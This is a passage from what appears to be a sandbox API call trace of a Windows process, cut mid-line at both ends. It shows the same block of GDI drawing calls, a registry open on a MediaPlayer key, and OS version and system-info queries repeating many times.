(hdc=0x0) returned 0 [0017.502] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.502] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.502] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.502] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.503] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef04027d [0017.503] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf9040713 [0017.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a3 [0017.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a4 [0017.503] CombineRgn (hrgnDst=0x10409a3, hrgnSrc1=0xef04027d, hrgnSrc2=0xf9040713, iMode=1) returned 1 [0017.503] CombineRgn (hrgnDst=0x10409a4, hrgnSrc1=0xef04027d, hrgnSrc2=0xf9040713, iMode=4) returned 2 [0017.503] CreateSolidBrush (color=0xff) returned 0x21009a2 [0017.503] CreateSolidBrush (color=0xff0000) returned 0x11009a5 [0017.503] DeleteObject (ho=0x11009a5) returned 1 [0017.503] DeleteObject (ho=0xf9040713) returned 1 [0017.503] DeleteObject (ho=0xef04027d) returned 1 [0017.503] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.503] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.503] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.503] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.503] BeginPath (hdc=0x0) returned 0 [0017.503] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.503] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.503] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.503] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.503] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.503] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.503] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.503] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa040713 [0017.503] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf004027d [0017.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a6 [0017.503] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a7 [0017.504] CombineRgn (hrgnDst=0x10409a6, hrgnSrc1=0xfa040713, hrgnSrc2=0xf004027d, iMode=1) returned 1 [0017.504] CombineRgn (hrgnDst=0x10409a7, hrgnSrc1=0xfa040713, hrgnSrc2=0xf004027d, iMode=4) returned 2 [0017.504] CreateSolidBrush (color=0xff) returned 0x21009a5 [0017.504] CreateSolidBrush (color=0xff0000) returned 0x11009a8 [0017.504] DeleteObject (ho=0x11009a8) returned 1 [0017.504] DeleteObject (ho=0xf004027d) returned 1 [0017.504] DeleteObject (ho=0xfa040713) returned 1 [0017.504] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.504] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.504] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.504] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.504] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.504] BeginPath (hdc=0x0) returned 0 [0017.504] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.504] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.504] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.504] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.504] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.504] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.504] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.504] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.504] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf104027d [0017.504] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb040713 [0017.504] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a9 [0017.504] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409aa [0017.504] CombineRgn (hrgnDst=0x10409a9, hrgnSrc1=0xf104027d, hrgnSrc2=0xfb040713, iMode=1) returned 1 [0017.504] CombineRgn (hrgnDst=0x10409aa, hrgnSrc1=0xf104027d, hrgnSrc2=0xfb040713, iMode=4) returned 2 [0017.504] CreateSolidBrush (color=0xff) returned 0x21009a8 [0017.504] CreateSolidBrush (color=0xff0000) returned 0x11009ab [0017.504] DeleteObject (ho=0x11009ab) returned 1 [0017.504] DeleteObject (ho=0xfb040713) returned 1 [0017.505] DeleteObject (ho=0xf104027d) returned 1 [0017.505] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.505] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.505] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.505] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.505] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.505] BeginPath (hdc=0x0) returned 0 [0017.505] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.505] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.505] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.505] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.505] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.505] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.505] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.505] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.505] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc040713 [0017.505] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf204027d [0017.505] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ac [0017.505] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ad [0017.505] CombineRgn (hrgnDst=0x10409ac, hrgnSrc1=0xfc040713, hrgnSrc2=0xf204027d, iMode=1) returned 1 [0017.505] CombineRgn (hrgnDst=0x10409ad, hrgnSrc1=0xfc040713, hrgnSrc2=0xf204027d, iMode=4) returned 2 [0017.505] CreateSolidBrush (color=0xff) returned 0x21009ab [0017.505] CreateSolidBrush (color=0xff0000) returned 0x11009ae [0017.505] DeleteObject (ho=0x11009ae) returned 1 [0017.505] DeleteObject (ho=0xf204027d) returned 1 [0017.505] DeleteObject (ho=0xfc040713) returned 1 [0017.505] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.505] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.505] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.506] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.506] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.506] BeginPath (hdc=0x0) returned 0 [0017.506] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.506] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.506] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.506] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.506] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.506] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.506] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.506] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.506] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf304027d [0017.506] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd040713 [0017.506] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409af [0017.506] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b0 [0017.506] CombineRgn (hrgnDst=0x10409af, hrgnSrc1=0xf304027d, hrgnSrc2=0xfd040713, iMode=1) returned 1 [0017.506] CombineRgn (hrgnDst=0x10409b0, hrgnSrc1=0xf304027d, hrgnSrc2=0xfd040713, iMode=4) returned 2 [0017.506] CreateSolidBrush (color=0xff) returned 0x21009ae [0017.506] CreateSolidBrush (color=0xff0000) returned 0x11009b1 [0017.506] DeleteObject (ho=0x11009b1) returned 1 [0017.506] DeleteObject (ho=0xfd040713) returned 1 [0017.506] DeleteObject (ho=0xf304027d) returned 1 [0017.506] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.506] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.506] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.506] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.506] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.506] BeginPath (hdc=0x0) returned 0 [0017.506] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.506] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.507] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.507] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.507] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.507] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.507] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.507] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.507] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe040713 [0017.507] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf404027d [0017.507] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b2 [0017.507] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b3 [0017.507] CombineRgn (hrgnDst=0x10409b2, hrgnSrc1=0xfe040713, hrgnSrc2=0xf404027d, iMode=1) returned 1 [0017.507] CombineRgn (hrgnDst=0x10409b3, hrgnSrc1=0xfe040713, hrgnSrc2=0xf404027d, iMode=4) returned 2 [0017.507] CreateSolidBrush (color=0xff) returned 0x21009b1 [0017.507] CreateSolidBrush (color=0xff0000) returned 0x11009b4 [0017.507] DeleteObject (ho=0x11009b4) returned 1 [0017.507] DeleteObject (ho=0xf404027d) returned 1 [0017.507] DeleteObject (ho=0xfe040713) returned 1 [0017.507] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.507] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.507] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.507] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.507] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.507] BeginPath (hdc=0x0) returned 0 [0017.507] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.507] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.507] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.507] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.507] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.507] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.507] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.508] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.508] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf504027d [0017.508] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff040713 [0017.508] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b5 [0017.508] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b6 [0017.508] CombineRgn (hrgnDst=0x10409b5, hrgnSrc1=0xf504027d, hrgnSrc2=0xff040713, iMode=1) returned 1 [0017.508] CombineRgn (hrgnDst=0x10409b6, hrgnSrc1=0xf504027d, hrgnSrc2=0xff040713, iMode=4) returned 2 [0017.508] CreateSolidBrush (color=0xff) returned 0x21009b4 [0017.508] CreateSolidBrush (color=0xff0000) returned 0x11009b7 [0017.508] DeleteObject (ho=0x11009b7) returned 1 [0017.508] DeleteObject (ho=0xff040713) returned 1 [0017.508] DeleteObject (ho=0xf504027d) returned 1 [0017.508] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.508] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.508] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.508] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.508] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.508] BeginPath (hdc=0x0) returned 0 [0017.508] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.508] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.508] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.508] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.508] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.508] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.508] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.508] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.508] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40713 [0017.509] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf604027d [0017.509] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b8 [0017.509] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409b9 [0017.509] CombineRgn (hrgnDst=0x10409b8, hrgnSrc1=0x40713, hrgnSrc2=0xf604027d, iMode=1) returned 1 [0017.509] CombineRgn (hrgnDst=0x10409b9, hrgnSrc1=0x40713, hrgnSrc2=0xf604027d, iMode=4) returned 2 [0017.509] CreateSolidBrush (color=0xff) returned 0x21009b7 [0017.509] CreateSolidBrush (color=0xff0000) returned 0x11009ba [0017.509] DeleteObject (ho=0x11009ba) returned 1 [0017.509] DeleteObject (ho=0xf604027d) returned 1 [0017.509] DeleteObject (ho=0x40713) returned 1 [0017.509] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.509] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.509] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.509] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.509] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.509] BeginPath (hdc=0x0) returned 0 [0017.509] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.509] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.509] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.509] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.509] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.509] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.509] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.509] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.509] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf704027d [0017.509] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1040713 [0017.509] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409bb [0017.509] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409bc [0017.509] CombineRgn (hrgnDst=0x10409bb, hrgnSrc1=0xf704027d, hrgnSrc2=0x1040713, iMode=1) returned 1 [0017.509] CombineRgn (hrgnDst=0x10409bc, hrgnSrc1=0xf704027d, hrgnSrc2=0x1040713, iMode=4) returned 2 [0017.510] CreateSolidBrush (color=0xff) returned 0x21009ba [0017.510] CreateSolidBrush (color=0xff0000) returned 0x11009bd [0017.510] DeleteObject (ho=0x11009bd) returned 1 [0017.510] DeleteObject (ho=0x1040713) returned 1 [0017.510] DeleteObject (ho=0xf704027d) returned 1 [0017.510] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.510] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.510] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.510] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.510] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.510] BeginPath (hdc=0x0) returned 0 [0017.510] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.510] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.510] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.510] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.510] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.510] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.510] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.510] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2040713 [0017.510] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf804027d [0017.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 